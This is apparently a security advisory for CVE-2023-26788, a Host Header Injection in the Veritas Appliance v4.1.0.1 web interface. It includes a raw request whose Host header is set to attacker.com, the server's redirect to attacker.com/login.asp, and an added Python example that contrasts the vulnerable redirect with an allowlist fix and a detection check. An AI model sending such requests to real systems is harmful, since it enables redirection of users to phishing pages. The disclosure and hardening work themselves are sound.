Veritas-Technologies/Veritas Appliance v4.1.0.1/HHI/HHI_CVE-2023-26788.txt
Host Header Injection (HHI) Attack - CVE-2023-26788

Version: Veritas Appliance v4.1.0.1
Type: Unauthenticated Remote attack
We have identified that the "Veritas Appliance v4.1.0.1" web interface is affected by Host Header Injection attacks. The HTTP Host header can be manipulated to make the application behave in unexpected ways: any change to the header simply causes the request to be sent to a completely different domain/IP address. This is because the server implicitly trusts the Host header and fails to validate or escape it properly.

An attacker would be able to tamper with the Host header value while intercepting the HTTP request (MiTM attack); the attacker's domain would then be embedded in the web page code used for redirection, forcing the victim's web browser to redirect to the attacker's domain or malicious web page. This expands the potential for further attacks and malicious actions.
Below, evidence is provided.

Request:

GET / HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 0
Origin: https://172.16.4.100
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Response:

HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Thu Jun 7 11:45:03 2018
Cache-Control: no-cache, no-store, must-revalidate,private
Pragma: no-cache
Expires: 0
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://attacker.com/login.asp

<html><head></head><body>
This document has moved to a new <a href="https://attacker.com/login.asp">location</a>.
Please update your documents to reflect the new location.
</body></html>
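The following is an added illustration, not code from Veritas or the GoAhead web server: it reproduces the reflected-Host redirect pattern shown in the evidence above beside a hardened variant that validates the Host header against an allowlist and builds the Location URL from a configured canonical host, plus a small check that flags a Location header pointing off-site. The allowlist, canonical host and the sample request are constructed for the example.

```python
# Added example (not Veritas/GoAhead code). ALLOWED_HOSTS, CANONICAL_HOST and
# SAMPLE_REQUEST are constructed values for illustration only.
from urllib.parse import urlsplit

# Hostnames/IPs the appliance legitimately answers on (constructed allowlist).
ALLOWED_HOSTS = {"172.16.4.100", "appliance.example.internal"}
CANONICAL_HOST = "172.16.4.100"   # used for absolute URLs instead of client input

# Trimmed version of the request in the advisory (constructed sample).
SAMPLE_REQUEST = """GET / HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0
Connection: close

"""

def parse_headers(raw_request: str) -> dict:
    """Parse the header section of a raw HTTP/1.x request into a dict keyed by
    lower-cased header name; parsing stops at the blank line before the body."""
    headers = {}
    for line in raw_request.lstrip().splitlines()[1:]:   # [0] is the request line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def vulnerable_redirect(headers: dict) -> tuple:
    """Mirrors the advisory's behaviour: the Host header is copied into
    Location unchecked, so whoever controls Host controls the redirect."""
    return 302, {"Location": f"https://{headers.get('host', '')}/login.asp"}

def hardened_redirect(headers: dict) -> tuple:
    """Reject any request whose Host (port stripped) is not on the allowlist,
    and derive the redirect target from configuration, never from the client."""
    host = headers.get("host", "").split(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        return 400, {}
    return 302, {"Location": f"https://{CANONICAL_HOST}/login.asp"}

def location_host_is_trusted(response_headers: dict) -> bool:
    """Detection helper for response review: True unless a Location header
    points at a host outside the allowlist (the symptom shown above)."""
    location = response_headers.get("Location")
    if location is None:
        return True
    return urlsplit(location).hostname in ALLOWED_HOSTS
```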